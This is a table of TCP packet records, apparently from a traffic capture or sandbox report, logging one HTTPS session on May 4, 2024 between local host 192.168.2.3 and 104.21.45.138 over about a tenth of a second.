May 4, 2024 09:50:38.940907001 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.941051960 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.942591906 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.942606926 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.942660093 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.942665100 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.942678928 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.942703962 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.944582939 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.944598913 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.944637060 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.944643021 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.944678068 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.946329117 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.946350098 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.946386099 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.946392059 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.946407080 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.946424961 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.948636055 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.948652029 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.948687077 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.948693037 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.948715925 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.948729992 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.950534105 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.950551033 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.950615883 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.950623035 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.950653076 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.952342033 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.952357054 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.952411890 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.952419043 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.952440023 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.952460051 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.954319000 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.954334974 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.954381943 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.954387903 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.954397917 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.954415083 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.956139088 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.956156015 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.956202984 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.956208944 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.956219912 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.956243038 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.958339930 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.958358049 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.958412886 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.958430052 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.958462954 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.960272074 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.960287094 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.960320950 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.960330009 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.960341930 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.960362911 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.962100029 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.962114096 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.962183952 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.962191105 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.962224007 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.964000940 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.964015961 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.964062929 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.964070082 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.964085102 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.964113951 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.965847015 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.965862989 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.965924025 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.965930939 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.966025114 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.968079090 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.968095064 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.968162060 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.968168974 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.968246937 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.970169067 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.970185041 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.970259905 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.970267057 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.970380068 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.971977949 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.971996069 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.972055912 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.972062111 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.972093105 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.973771095 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.973787069 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.973858118 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.973865032 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.973898888 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.976412058 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.976430893 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.976509094 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.976516008 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.976547003 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.977852106 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.977868080 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.977905035 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.977910995 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.977933884 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.977963924 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.979707956 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.979726076 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.979777098 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.979783058 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.979810953 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.979825974 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.981677055 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.981693983 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.981775045 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.981781960 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.982089996 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.984275103 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.984292030 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.984349012 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.984354973 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.984555960 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.986149073 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.986166000 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.986218929 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.986224890 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.986243963 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.986268044 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.987587929 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.987603903 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.987672091 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.987678051 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.990219116 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.990238905 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.990291119 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.990298986 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.990314960 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.990341902 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.992170095 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.992185116 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.992258072 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.992265940 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.993911982 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.993931055 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.993995905 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.994004965 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.994781017 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.995758057 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.995774031 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.995825052 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.995831966 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.995973110 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.998033047 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.998050928 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.998111963 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.998120070 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.998209953 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.999816895 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.999834061 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.999867916 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.999872923 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:38.999891996 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:38.999907970 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.001605034 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.001620054 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.001697063 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.001703024 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.001729012 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.001748085 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.003420115 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.003434896 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.003495932 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.003501892 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.003530979 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.005458117 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.005479097 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.005553007 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.005558968 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.005676031 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.007277966 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.007292986 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.007355928 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.007361889 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.007414103 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.009082079 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.009102106 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.009159088 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.009166002 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.010824919 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.010847092 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.010895967 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.010902882 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.010941982 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.012962103 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.012999058 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.013065100 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.013071060 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.013103962 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.014224052 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.014244080 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.014296055 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.014306068 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.014656067 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.016222000 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.016237020 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.016280890 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.016288042 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.016450882 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.017093897 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.017108917 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.017167091 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.017173052 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.017265081 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.018946886 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.018963099 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.019026995 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.019033909 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.019068956 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.020803928 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.020824909 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.020876884 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.020883083 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.020915031 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.020934105 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.022645950 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.022660971 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.022731066 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.022737980 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.022855043 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.024391890 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.024408102 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.024467945 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.024473906 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.024509907 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.024533987 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.025368929 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.025383949 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.025418997 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.025424957 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.025448084 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.025466919 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.027290106 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.027304888 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.027365923 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.027371883 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.028748989 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.028769970 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.028810024 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.028815985 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.028830051 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.028860092 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.030662060 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.030675888 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.030735016 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.030740976 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.031724930 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.031744003 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.031784058 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.031790018 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.031816959 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.031846046 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.033643961 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.033660889 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.033730030 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.033737898 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.034765959 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.034785986 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.034832001 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.034838915 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.034858942 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.034893036 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.036828995 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.036848068 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.036923885 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.036931038 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.037178993 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.037828922 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.037856102 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.037892103 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.037899017 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.037906885 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.037935972 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.039664984 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.039681911 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.039735079 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.039741993 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.039758921 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.039783955 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.040659904 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.040678024 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.040731907 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.040740013 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.040751934 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.040782928 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.045269966 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045300007 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045366049 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.045372963 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045452118 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045470953 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045500994 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.045507908 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.045521975 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.045547962 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.046700001 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.046720982 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.046767950 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.046775103 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.047298908 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.047317982 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.047350883 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.047358036 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.047378063 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.047403097 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.048304081 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.048319101 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.048365116 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.048372030 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.049963951 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.049983025 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.050045967 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.050052881 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.050086021 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.053733110 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.053762913 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.053867102 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.053875923 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.054377079 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.054399014 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.054464102 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.054474115 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.054485083 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.055028915 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.055043936 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.055098057 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.055107117 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.055278063 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.056976080 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.056997061 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.057141066 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.057154894 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.057212114 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.058046103 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.058065891 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.058115959 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:39.058123112 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.058665037 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:39.058706045 CEST	443	49732	104.21.45.138	192.168.2.3
